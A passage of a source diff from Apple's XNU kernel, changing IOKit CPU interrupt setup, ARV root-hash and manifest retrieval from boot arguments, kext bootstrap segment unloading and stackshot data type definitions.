= kIOReturnOffline; } else { @@ -4354,6 +4445,14 @@ IOUserServer::serviceDidStop(IOService * client, IOService * provider) } } +kern_return_t +IOService::ClientCrashed_Impl( + IOService * client, + uint64_t options) +{ + return kIOReturnUnsupported; +} + kern_return_t IOService::Stop_Impl( IOService * provider) @@ -4493,11 +4592,12 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments * } if (MACH_PORT_NULL != args->asyncWakePort) { + // this retain is for the OSAction to release + iokit_make_port_send(args->asyncWakePort); kr = CreateActionKernelCompletion(sizeof(IOUserUserClientActionRef), &action); assert(KERN_SUCCESS == kr); ref = (typeof(ref))action->GetReference(); bcopy(args->asyncReference, &ref->asyncRef[0], args->asyncReferenceCount * sizeof(ref->asyncRef[0])); - kr = action->SetAbortedHandler(^(void) { IOUserUserClientActionRef * ref; IOReturn ret; @@ -4528,12 +4628,14 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments * OSSafeReleaseNULL(action); if (kIOReturnSuccess != kr) { - if (ref) { - // mig will destroy any async port, remove our pointer to it - bzero(&ref->asyncRef[0], sizeof(ref->asyncRef)); - } + // mig will destroy any async port return kr; } + if (MACH_PORT_NULL != args->asyncWakePort) { + // this release is for the mig created send right + iokit_release_port_send(args->asyncWakePort); + } + if (structureOutput) { if (args->structureVariableOutputData) { *args->structureVariableOutputData = structureOutput; diff --git a/iokit/Kernel/arm/AppleARMSMP.cpp b/iokit/Kernel/arm/AppleARMSMP.cpp index 9415e0226..9121b6bf6 100644 --- a/iokit/Kernel/arm/AppleARMSMP.cpp +++ b/iokit/Kernel/arm/AppleARMSMP.cpp @@ -37,6 +37,7 @@ extern "C" { #include #include +#include #include #include #include @@ -81,35 +82,53 @@ idle_timer_wrapper(void */*refCon*/, uint64_t *new_timeout_ticks) gPMGR->updateCPUIdle(new_timeout_ticks); } +static OSDictionary * +matching_dict_for_cpu_id(unsigned int cpu_id) +{ + // The cpu-id property in EDT doesn't necessarily match the dynamically + // assigned logical ID in XNU, so look up the cpu node by the physical + // (cluster/core) ID instead. + OSSymbolConstPtr cpuTypeSymbol = OSSymbol::withCString("cpu"); + OSSymbolConstPtr cpuIdSymbol = OSSymbol::withCString("reg"); + OSDataPtr cpuId = OSData::withBytes(&(topology_info->cpus[cpu_id].phys_id), sizeof(uint32_t)); + + OSDictionary *propMatch = OSDictionary::withCapacity(4); + propMatch->setObject(gIODTTypeKey, cpuTypeSymbol); + propMatch->setObject(cpuIdSymbol, cpuId); + + OSDictionary *matching = IOService::serviceMatching("IOPlatformDevice"); + matching->setObject(gIOPropertyMatchKey, propMatch); + + propMatch->release(); + cpuTypeSymbol->release(); + cpuIdSymbol->release(); + cpuId->release(); + + return matching; +} + static void register_aic_handlers(const ml_topology_cpu *cpu_info, ipi_handler_t ipi_handler, perfmon_interrupt_handler_func pmi_handler) { - const int n_irqs = 3; - int i; - IOInterruptVectorNumber irqlist[n_irqs] = { - cpu_info->self_ipi_irq, - cpu_info->other_ipi_irq, - cpu_info->pmi_irq }; - - IOService *fakeCPU = new IOService(); - if (!fakeCPU || !fakeCPU->init()) { - panic("Can't initialize fakeCPU"); - } + OSDictionary *matching = matching_dict_for_cpu_id(cpu_info->cpu_id); + IOService *cpu = IOService::waitForMatchingService(matching, UINT64_MAX); + matching->release(); - IOInterruptSource source[n_irqs]; - for (i = 0; i < n_irqs; i++) { - source[i].vectorData = OSData::withBytes(&irqlist[i], sizeof(irqlist[0])); + OSArray *irqs = (OSArray *) cpu->getProperty(gIOInterruptSpecifiersKey); + if (!irqs) { + panic("Error finding interrupts for CPU %d", cpu_info->cpu_id); } - fakeCPU->_interruptSources = source; - if (cpu_info->self_ipi_irq && cpu_info->other_ipi_irq) { + unsigned int irqcount = irqs->getCount(); + + if (irqcount == 3) { // Legacy configuration, for !HAS_IPI chips (pre-Skye). - if (gAIC->registerInterrupt(fakeCPU, 0, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 0) != kIOReturnSuccess || - gAIC->registerInterrupt(fakeCPU, 1, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 1) != kIOReturnSuccess) { + if (cpu->registerInterrupt(0, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(0) != kIOReturnSuccess || + cpu->registerInterrupt(2, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(2) != kIOReturnSuccess) { panic("Error registering IPIs"); } #if !defined(HAS_IPI) @@ -118,17 +137,14 @@ register_aic_handlers(const ml_topology_cpu *cpu_info, aic_ipis = true; #endif } + // Conditional, because on Skye and later, we use an FIQ instead of an external IRQ. - if (pmi_handler && cpu_info->pmi_irq) { - if (gAIC->registerInterrupt(fakeCPU, 2, NULL, (IOInterruptHandler)pmi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 2) != kIOReturnSuccess) { + if (pmi_handler && irqcount == 1) { + if (cpu->registerInterrupt(1, NULL, (IOInterruptAction)pmi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(1) != kIOReturnSuccess) { panic("Error registering PMI"); } } - - for (i = 0; i < n_irqs; i++) { - source[i].vectorData->release(); - } } static void @@ -158,7 +174,6 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/) } memset(machProcessors, 0, array_size); - ml_cpu_init_state(); for (unsigned int cpu = 0; cpu < topology_info->num_cpus; cpu++) { const ml_topology_cpu *cpu_info = &topology_info->cpus[cpu]; const unsigned int cpu_id = cpu_info->cpu_id; @@ -192,6 +207,7 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/) panic("processor_start failed"); } } + ml_cpu_init_completed(); IOService::publishResource(gIOAllCPUInitializedKey, kOSBooleanTrue); } @@ -221,7 +237,8 @@ PE_cpu_start(cpu_id_t target, unsigned int cpu_id = target_to_cpu_id(target); if (cpu_id != boot_cpu) { - gPMGR->enableCPUCore(cpu_id); + extern unsigned int LowResetVectorBase; + gPMGR->enableCPUCore(cpu_id, ml_vtophys((vm_offset_t)&LowResetVectorBase)); } return KERN_SUCCESS; } diff --git a/iokit/Kernel/i386/IOKeyStoreHelper.cpp b/iokit/Kernel/i386/IOKeyStoreHelper.cpp index ca0e3b895..8c71598d7 100644 --- a/iokit/Kernel/i386/IOKeyStoreHelper.cpp +++ b/iokit/Kernel/i386/IOKeyStoreHelper.cpp @@ -54,24 +54,19 @@ static IOMemoryDescriptor* apfsKeyData = NULL; IOMemoryDescriptor* IOGetAPFSKeyStoreData(); void IOSetAPFSKeyStoreData(IOMemoryDescriptor* data); -static volatile UInt32 arvRootHashFetched = 0; +static volatile UInt32 ARVRootHashFetched = 0; static volatile UInt32 bsARVRootHashFetched = 0; -static IOMemoryDescriptor* arvRootHashData = NULL; -static IOMemoryDescriptor* bsARVRootHashData = NULL; IOMemoryDescriptor* IOGetARVRootHashData(void); -void IOSetARVRootHashData(IOMemoryDescriptor* arvData); - IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void); -bool IOBaseSystemARVRootHashAvailable(void); -void IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData); +bool IOBaseSystemARVRootHashAvailable(void); -static volatile UInt32 arvManifestFetched = 0; -static IOMemoryDescriptor* arvManifestData = NULL; +static volatile UInt32 ARVManifestFetched = 0; +static volatile UInt32 bsARVManifestFetched = 0; IOMemoryDescriptor* IOGetARVManifestData(void); -void IOSetARVManifestData(IOMemoryDescriptor* arvData); +IOMemoryDescriptor* IOGetBaseSystemARVManifestData(void); __END_DECLS @@ -181,34 +176,15 @@ IOGetAPFSKeyStoreData() // ARV Root Hash fetcher -// Store in-memory Root Hash -void -IOSetARVRootHashData(IOMemoryDescriptor* arvData) -{ - // Do not allow re-fetching of the boot_args root hash by passing NULL here. - if (arvData) { - arvRootHashData = arvData; - arvRootHashFetched = 0; - } -} - -// Retrieve any root hash we may have (stored in boot_args or in-memory) +// Retrieve any root hash we may have (stored in boot_args) IOMemoryDescriptor* IOGetARVRootHashData(void) { // Check if someone got the root hash before us - if (!OSCompareAndSwap(0, 1, &arvRootHashFetched)) { + if (!OSCompareAndSwap(0, 1, &ARVRootHashFetched)) { return NULL; } - // Do we have in-memory root hash? - if (arvRootHashData) { - IOMemoryDescriptor* arvData = arvRootHashData; - arvRootHashData = NULL; - return arvData; - } - - // Looks like there was no in-memory root hash and it's the first call - try boot_args boot_args* args = (boot_args*)PE_state.bootArgs; DEBG("%s: data at address %llu size %llu\n", __func__, args->arvRootHashStart, args->arvRootHashSize); @@ -228,68 +204,62 @@ IOGetARVRootHashData(void) return memoryDescriptor; } -// Base System Analogues +// Base System Analogue IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void) { - //TBD! - return NULL; + // Check if someone got the base system root hash before us + if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) { + return NULL; + } + + boot_args* args = (boot_args*)PE_state.bootArgs; + + DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVRootHashStart, args->bsARVRootHashSize); + if (args->bsARVRootHashStart == 0) { + return NULL; + } + + // We have the base system root hash in the boot_args, create IOMemoryDescriptor for the blob + IOAddressRange ranges; + ranges.address = args->bsARVRootHashStart; + ranges.length = args->bsARVRootHashSize; + + const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone; + + IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options); + DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); + return memoryDescriptor; } bool IOBaseSystemARVRootHashAvailable(void) { - // Check if someone got the root hash before us - if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) { + boot_args* args = (boot_args*)PE_state.bootArgs; + + if (args->bsARVRootHashStart == 0 || args->bsARVRootHashSize == 0) { return false; } - // Do we have in-memory root hash? - if (bsARVRootHashData) { - return true; + if (args->bsARVManifestStart == 0 || args->bsARVManifestSize == 0) { + return false; } - return false; -} - -void -IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData) -{ - return; + return true; } - // ARV Manifest fetcher -// Store in-memory Manifest -void -IOSetARVManifestData(IOMemoryDescriptor* arvData) -{ - // Do not allow re-fetching of the boot_args manifest by passing NULL here. - if (arvData) { - arvManifestData = arvData; - arvManifestFetched = 0; - } -} - -// Retrieve any manifest we may have (stored in boot_args or in-memory) +// Retrieve any manifest we may have (stored in boot_args) IOMemoryDescriptor* IOGetARVManifestData(void) { // Check if someone got the manifest before us - if (!OSCompareAndSwap(0, 1, &arvManifestFetched)) { + if (!OSCompareAndSwap(0, 1, &ARVManifestFetched)) { return NULL; } - // Do we have in-memory manifest? - if (arvManifestData) { - IOMemoryDescriptor* arvData = arvManifestData; - arvManifestData = NULL; - return arvData; - } - - // Looks like there was no in-memory manifest and it's the first call - try boot_args boot_args* args = (boot_args*)PE_state.bootArgs; DEBG("%s: data at address %llu size %llu\n", __func__, args->arvManifestStart, args->arvManifestSize); @@ -308,3 +278,32 @@ IOGetARVManifestData(void) DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); return memoryDescriptor; } + +// Base System Analogue + +IOMemoryDescriptor* +IOGetBaseSystemARVManifestData(void) +{ + // Check if someone got the base system manifest before us + if (!OSCompareAndSwap(0, 1, &bsARVManifestFetched)) { + return NULL; + } + + boot_args* args = (boot_args*)PE_state.bootArgs; + + DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVManifestStart, args->bsARVManifestSize); + if (args->bsARVManifestStart == 0) { + return NULL; + } + + // We have the manifest in the boot_args, create IOMemoryDescriptor for the blob + IOAddressRange ranges; + ranges.address = args->bsARVManifestStart; + ranges.length = args->bsARVManifestSize; + + const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone; + + IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options); + DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); + return memoryDescriptor; +} diff --git a/iokit/Tests/Tests.cpp b/iokit/Tests/Tests.cpp index ac67b43b5..7624171d6 100644 --- a/iokit/Tests/Tests.cpp +++ b/iokit/Tests/Tests.cpp @@ -738,6 +738,6 @@ sysctl_iokittest(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused } SYSCTL_PROC(_kern, OID_AUTO, iokittest, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_iokittest, "I", ""); #endif // __clang_analyzer__ diff --git a/iokit/bsddev/IOKitBSDInit.cpp b/iokit/bsddev/IOKitBSDInit.cpp index 8205d93bc..e2769e31b 100644 --- a/iokit/bsddev/IOKitBSDInit.cpp +++ b/iokit/bsddev/IOKitBSDInit.cpp @@ -55,6 +55,8 @@ extern dev_t mdevlookup(int devid); extern void mdevremoveall(void); extern int mdevgetrange(int devid, uint64_t *base, uint64_t *size); extern void di_root_ramfile(IORegistryEntry * entry); +extern int IODTGetDefault(const char *key, void *infoAddr, unsigned int infoSize); +extern boolean_t cpuid_vmm_present(void); #define ROUNDUP(a, b) (((a) + ((b) - 1)) & (~((b) - 1))) @@ -544,6 +546,26 @@ do_reboot: return true; } +int +IOGetVMMPresent(void) +{ + int hv_vmm_present = 0; + +#if defined(__arm64__) + if (IODTGetDefault("vmm-present", &hv_vmm_present, sizeof(hv_vmm_present)) < 0) { + return 0; + } + + if (hv_vmm_present != 0) { + hv_vmm_present = 1; + } +#elif defined(__x86_64__) + hv_vmm_present = cpuid_vmm_present(); +#endif + + return hv_vmm_present; +} + kern_return_t IOFindBSDRoot( char * rootName, unsigned int rootNameSize, dev_t * root, u_int32_t * oflags ) diff --git a/libkdd/kcdata.h b/libkdd/kcdata.h index f2eaf624c..d57bd0c27 100644 --- a/libkdd/kcdata.h +++ b/libkdd/kcdata.h @@ -492,7 +492,7 @@ struct kcdata_type_definition { #define STACKSHOT_KCTYPE_TASK_SNAPSHOT 0x905u /* task_snapshot_v2 */ #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT 0x906u /* thread_snapshot_v2, thread_snapshot_v3 */ #define STACKSHOT_KCTYPE_DONATING_PIDS 0x907u /* int[] */ -#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */ +#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* dyld_shared_cache_loadinfo */ #define STACKSHOT_KCTYPE_THREAD_NAME 0x909u /* char[] */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME 0x90Au /* struct stack_snapshot_frame32 */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME64 0x90Bu /* struct stack_snapshot_frame64 */ @@ -556,17 +556,42 @@ struct dyld_uuid_info_64 { uuid_t imageUUID; }; +/* + * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures + * instead of this, since the field names match their contents better. + */ struct dyld_uuid_info_64_v2 { uint64_t imageLoadAddress; /* XXX image slide */ uuid_t imageUUID; /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ - uint64_t imageSlidBaseAddress; /* slid base address of image */ + uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */ +}; + +/* + * This is the renamed version of dyld_uuid_info_64 with more accurate + * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO. Any users + * must be aware of the dyld_uuid_info_64* version history and ensure + * the fields they are accessing are within the actual bounds. + * + * OLD_FIELD NEW_FIELD + * imageLoadAddress sharedCacheSlide + * imageUUID sharedCacheUUID + * imageSlidBaseAddress sharedCacheUnreliableSlidBaseAddress + * - sharedCacheSlidFirstMapping + */ +struct dyld_shared_cache_loadinfo { + uint64_t sharedCacheSlide; /* image slide value */ + uuid_t sharedCacheUUID; + /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ + uint64_t sharedCacheUnreliableSlidBaseAddress; /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */ + /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */ + uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */ }; struct dyld_aot_cache_uuid_info { - uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */ + uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */ uuid_t x86UUID; /* UUID of x86 shared cache */ - uint64_t aotSlidBaseAddress; /* slide base address of aot cache */ + uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */ uuid_t aotUUID; /* UUID of aot shared cache */ }; @@ -618,6 +643,9 @@ enum task_snapshot_flags { kTaskIsDirtyTracked = 0x4000000, kTaskAllowIdleExit = 0x8000000, kTaskIsTranslated = 0x10000000, + kTaskSharedRegionNone = 0x20000000, /* task doesn't have a shared region */ + kTaskSharedRegionSystem = 0x40000000, /* task is attached to system shared region */ + kTaskSharedRegionOther = 0x80000000, /* task is attached to a different shared region */ }; enum thread_snapshot_flags { @@ -876,6 +904,12 @@ struct stackshot_duration { uint64_t stackshot_duration_outer; } __attribute__((packed)); +struct stackshot_duration_v2 { + uint64_t stackshot_duration; + uint64_t stackshot_duration_outer; + uint64_t stackshot_duration_prior; +} __attribute__((packed)); + struct stackshot_fault_stats { uint32_t sfs_pages_faulted_in; /* number of pages faulted in using KDP fault path */ uint64_t sfs_time_spent_faulting; /* MATUs spent faulting */ diff --git a/libkdd/kcdtypes.c b/libkdd/kcdtypes.c index cca45ba6c..11d38b068 100644 --- a/libkdd/kcdtypes.c +++ b/libkdd/kcdtypes.c @@ -157,9 +157,14 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: { i = 0; + /* + * for backwards compatibility, we keep the old field names, but the + * new data is being put in dyld_shared_cache_loadinfo + */ _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageLoadAddress); _SUBTYPE_ARRAY(KC_ST_UINT8, struct dyld_uuid_info_64_v2, imageUUID, 16); _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageSlidBaseAddress); + _SUBTYPE(KC_ST_UINT64, struct dyld_shared_cache_loadinfo, sharedCacheSlidFirstMapping); setup_type_definition(retval, type_id, i, "shared_cache_dyld_load_info"); break; } @@ -546,10 +551,12 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s case STACKSHOT_KCTYPE_STACKSHOT_DURATION: { i = 0; - _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration); - _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration_outer); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_outer); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_prior); subtypes[0].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; subtypes[1].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; + subtypes[2].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; setup_type_definition(retval, type_id, i, "stackshot_duration"); break; } diff --git a/libkern/c++/OSKext.cpp b/libkern/c++/OSKext.cpp index 8b7c090e3..009375baa 100644 --- a/libkern/c++/OSKext.cpp +++ b/libkern/c++/OSKext.cpp @@ -975,7 +975,9 @@ OSKext::removeKextBootstrap(void) int dt_symtab_size = 0; int dt_result = 0; - kernel_segment_command_t * seg_to_remove = NULL; + kernel_segment_command_t * seg_kld = NULL; + kernel_segment_command_t * seg_klddata = NULL; + kernel_segment_command_t * seg_linkedit = NULL; const char __unused * dt_segment_name = NULL; void __unused * segment_paddress = NULL; @@ -1015,42 +1017,60 @@ OSKext::removeKextBootstrap(void) } /***** - * KLD bootstrap segment. + * KLD & KLDDATA bootstrap segments. */ // xxx - should rename KLD segment - seg_to_remove = getsegbyname("__KLD"); - if (seg_to_remove) { - OSRuntimeUnloadCPPForSegment(seg_to_remove); + seg_kld = getsegbyname("__KLD"); + seg_klddata = getsegbyname("__KLDDATA"); + if (seg_klddata) { + // __mod_term_func is part of __KLDDATA + OSRuntimeUnloadCPPForSegment(seg_klddata); } #if __arm__ || __arm64__ - /* Free the memory that was set up by bootx. + /* Free the memory that was set up by iBoot. + */ +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* We cannot free the KLD segment with CTRR enabled as it contains text and + * is covered by the contiguous rorgn. */ dt_segment_name = "Kernel-__KLD"; if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) { - /* We cannot free this with KTRR enabled, as we cannot - * update the permissions on the KLD range this late - * in the boot process. - */ IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress, - (int)segment_size); + (int)segment_size); // calls ml_static_mfree + } else if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) { + /* With fileset KCs, the Kernel KLD segment is not recorded in the DT. */ + ml_static_mfree(ml_static_ptovirt(seg_kld->vmaddr - gVirtBase + gPhysBase), + seg_kld->vmsize); + } +#endif + dt_segment_name = "Kernel-__KLDDATA"; + if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) { + IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress, + (int)segment_size); // calls ml_static_mfree + } else if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) { + /* With fileset KCs, the Kernel KLDDATA segment is not recorded in the DT. */ + ml_static_mfree(ml_static_ptovirt(seg_klddata->vmaddr - gVirtBase + gPhysBase), + seg_klddata->vmsize); } #elif __i386__ || __x86_64__ /* On x86, use the mapping data from the segment load command to - * unload KLD directly. + * unload KLD & KLDDATA directly. * This may invalidate any assumptions about "avail_start" * defining the lower bound for valid physical addresses. */ - if (seg_to_remove && seg_to_remove->vmaddr && seg_to_remove->vmsize) { - bzero((void *)seg_to_remove->vmaddr, seg_to_remove->vmsize); - ml_static_mfree(seg_to_remove->vmaddr, seg_to_remove->vmsize); + if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) { + bzero((void *)seg_kld->vmaddr, seg_kld->vmsize); + ml_static_mfree(seg_kld->vmaddr, seg_kld->vmsize); + } + if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) { + bzero((void *)seg_klddata->vmaddr, seg_klddata->vmsize); + ml_static_mfree(seg_klddata->vmaddr, seg_klddata->vmsize); } #else #error arch #endif - seg_to_remove = NULL; - /***** * Prelinked kernel's symtab (if there is one). */ @@ -1062,7 +1082,7 @@ OSKext::removeKextBootstrap(void) } } - seg_to_remove = (kernel_segment_command_t *)getsegbyname("__LINKEDIT"); + seg_linkedit = (kernel_segment_command_t *)getsegbyname("__LINKEDIT"); /* kxld always needs the kernel's __LINKEDIT segment, but we can make it * pageable, unless keepsyms is set. To do that, we have to copy it from @@ -1084,9 +1104,9 @@ OSKext::removeKextBootstrap(void) vm_map_offset_t seg_copy_offset = 0; vm_map_size_t seg_length = 0; - seg_data = (void *) seg_to_remove->vmaddr; - seg_offset = (vm_map_offset_t) seg_to_remove->vmaddr; - seg_length = (vm_map_size_t) seg_to_remove->vmsize; + seg_data = (void *) seg_linkedit->vmaddr; + seg_offset = (vm_map_offset_t) seg_linkedit->vmaddr; + seg_length = (vm_map_size_t) seg_linkedit->vmsize; /* Allocate space for the LINKEDIT copy. */ @@ -1169,8 +1189,6 @@ OSKext::removeKextBootstrap(void) } #endif // VM_MAPPED_KEXTS - seg_to_remove = NULL; - result = kOSReturnSuccess; return result; @@ -1590,7 +1608,7 @@ bool OSKext::setAutounloadEnabled(bool flag) { bool result = flags.autounloadEnabled ? true : false; - flags.autounloadEnabled = flag ? 1 : 0; + flags.autounloadEnabled = flag ? (0 == flags.unloadUnsupported) : 0; if (result != (flag ? true : false)) { OSKextLog(this, @@ -1891,6 +1909,8 @@ OSKext::initWithPrelinkedInfoDict( getPropertyForHostArch(kOSBundleAllowUserLoadKey) == kOSBooleanTrue); if (shouldSaveSegments) { flags.resetSegmentsFromImmutableCopy = 1; + } else { + flags.unloadUnsupported = 1; } break; case KCKindPageable: @@ -1901,6 +1921,8 @@ OSKext::initWithPrelinkedInfoDict( flags.resetSegmentsFromImmutableCopy = 1; } else if (resetAuxKCSegmentOnUnload) { flags.resetSegmentsFromVnode = 1; + } else { + flags.unloadUnsupported = 1; } break; default: @@ -4084,6 +4106,15 @@ OSKext::removeKext( if (aKext->countRequestCallbacks()) { goto finish; } + if (aKext->flags.unloadUnsupported) { + result = kOSKextReturnInUse; + OSKextLog(aKext, + kOSKextLogErrorLevel | + kOSKextLogKextBookkeepingFlag, + "Can't remove kext %s; unsupported by cache.", + aKext->getIdentifierCString()); + goto finish; + } /* If we are terminating, send the request to the IOCatalogue * (which will actually call us right back but that's ok we have @@ -8978,7 +9009,7 @@ OSKext::addClass( getIdentifierCString(), aClass->getClassName()); - flags.autounloadEnabled = 1; + flags.autounloadEnabled = (0 == flags.unloadUnsupported); break; } } @@ -11829,6 +11860,24 @@ OSKext::loadFileSetKexts(OSDictionary * requestDict __unused) allow_fileset_load = false; #endif + /* + * Change with 70582300 + */ +#if 0 || !defined(VM_MAPPED_KEXTS) + /* + * On platforms that don't support the SystemKC or a file-backed + * AuxKC, the kext receipt for 3rd party kexts loaded by the booter + * needs to be queried before we load any codeless kexts or release + * any 3rd party kexts to run. On platforms that support a file-backed + * AuxKC, this process is done via the kext audit mechanism. + */ + + printf("KextLog: waiting for kext receipt to be queried.\n"); + while (!IOServiceWaitForMatchingResource(kOSKextReceiptQueried, UINT64_MAX)) { + IOSleep(30); + } +#endif /* !VM_MAPPED_KEXTS */ + /* * Get the args from the request. Right now we need the file * name for the pageable and the aux kext collection file sets. @@ -11910,6 +11959,21 @@ try_auxkc: OSDictionary *infoDict; parsedXML = consumeDeferredKextCollection(KCKindAuxiliary); infoDict = OSDynamicCast(OSDictionary, parsedXML.get()); +#if !defined(VM_MAPPED_KEXTS) + /* + * On platforms where we don't dynamically wire-down / page-in + * kext memory, we need to maintain the invariant that if the + * AuxKC in memory does not contain a kext receipt, then we + * should not load any of the kexts. + */ + size_t receipt_sz = 0; + if (getsectdatafromheader(akc_mh, kReceiptInfoSegment, kAuxKCReceiptSection, &receipt_sz) == NULL || receipt_sz == 0) { + OSKextLog(/* kext */ NULL, kOSKextLogErrorLevel | kOSKextLogArchiveFlag, + "KextLog: WARNING: Failed to load AuxKC from memory: missing receipt"); + ret = kOSKextReturnKCLoadFailure; + goto try_codeless; + } +#endif if (infoDict) { bool added; printf("KextLog: Adding kexts from in-memory AuxKC\n"); @@ -15251,6 +15315,17 @@ OSKextSavedMutableSegment::restoreContents(kernel_segment_command_t *seg) return kOSReturnSuccess; } +extern "C" kern_return_t +OSKextSetReceiptQueried(void) +{ + OSKextLog(/* kext */ NULL, + kOSKextLogStepLevel | kOSKextLogGeneralFlag, + "Setting kext receipt as queried"); + + IOService::publishResource(kOSKextReceiptQueried, kOSBooleanTrue); + return KERN_SUCCESS; +} + extern "C" const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t address) { diff --git a/libkern/c++/OSRuntime.cpp b/libkern/c++/OSRuntime.cpp index 40bd13b6f..de210c18a 100644 --- a/libkern/c++/OSRuntime.cpp +++ b/libkern/c++/OSRuntime.cpp @@ -330,7 +330,14 @@ finish: } #if defined(HAS_APPLE_PAC) -static inline void +#if !KASAN +/* + * Place this function in __KLD,__text on non-kasan builds so it gets unmapped + * after CTRR lockdown. + */ +__attribute__((noinline, section("__KLD,__text"))) +#endif +static void OSRuntimeSignStructorsInSegment(kernel_segment_command_t *segment) { kernel_section_t * section; diff --git a/libkern/conf/files b/libkern/conf/files index e5b444617..0ffca5b4f 100644 --- a/libkern/conf/files +++ b/libkern/conf/files @@ -55,6 +55,8 @@ libkern/stdio/scanf.c standard libkern/uuid/uuid.c standard libkern/os/log.c standard +libkern/os/log_encode.c standard +libkern/os/log_mem.c standard libkern/os/object.c standard libkern/os/internal.c standard libkern/os/refcnt.c standard @@ -96,6 +98,8 @@ libkern/crypto/corecrypto_rand.c optional crypto libkern/crypto/corecrypto_rsa.c optional crypto libkern/crypto/corecrypto_chacha20poly1305.c optional crypto +libkern/coretrust/coretrust.c standard + libkern/img4/interface.c standard libkern/stack_protector.c standard diff --git a/libkern/coretrust/coretrust.c b/libkern/coretrust/coretrust.c new file mode 100644 index 000000000..4a8f08b85 --- /dev/null +++ b/libkern/coretrust/coretrust.c @@ -0,0 +1,18 @@ +#include +#include +#include + +#if defined(SECURITY_READ_ONLY_LATE) +SECURITY_READ_ONLY_LATE(const coretrust_t *) coretrust = NULL; +#else +const coretrust_t *coretrust = NULL; +#endif + +void +coretrust_interface_register(const coretrust_t *ct) +{ + if (coretrust) { + panic("coretrust interface already set"); + } + coretrust = ct; +} diff --git a/libkern/firehose/chunk_private.h b/libkern/firehose/chunk_private.h index ac3fbe92e..513fd2082 100644 --- a/libkern/firehose/chunk_private.h +++ b/libkern/firehose/chunk_private.h @@ -64,6 +64,7 @@ typedef struct firehose_chunk_range_s { uint16_t fcr_length; } *firehose_chunk_range_t; +#if __has_include() #if defined(KERNEL) || defined(OS_FIREHOSE_SPI) OS_ALWAYS_INLINE @@ -181,6 +182,7 @@ firehose_chunk_tracepoint_end(firehose_chunk_t fc, #endif // OS_ATOMIC_HAS_STARVATION_FREE_RMW 